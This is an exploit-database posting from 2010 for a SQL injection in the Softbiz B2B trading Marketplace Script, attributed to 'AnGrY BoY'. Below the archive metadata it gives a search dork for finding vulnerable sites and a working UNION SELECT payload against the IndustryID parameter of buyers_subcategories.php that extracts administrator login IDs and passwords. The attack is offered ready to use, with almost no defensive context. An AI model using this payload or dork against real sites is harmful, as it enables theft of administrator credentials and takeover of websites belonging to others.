Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability
# Published : 2010-04-15
# Author : AnGrY BoY
# Previous Title : Joomla Component com_pandafminigames SQL Injection Vulnerabilities
# Next Title : Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability

# Exploit Title: Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability
# Date   :15/4/2010
# Author : AnGrY BoY
# Contact: h4kurd@hotmail.com & h4kurd@yahoo.com
# Home   : http://www.kurd-security.com
# Software Link : N/A
# Version : Softbiz B2B trading Marketplace Script
# Tested on : windows SP2
# CVE : 0
# Dork     : buyers_subcategories.php?IndustryID=
 
 
 
# expolit:


# http://localhost/path/buyers_subcategories.php?IndustryID=[SQL]
			
# http://localhost/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--
 
=============================================
# Gre3tZ :- all kurd-security members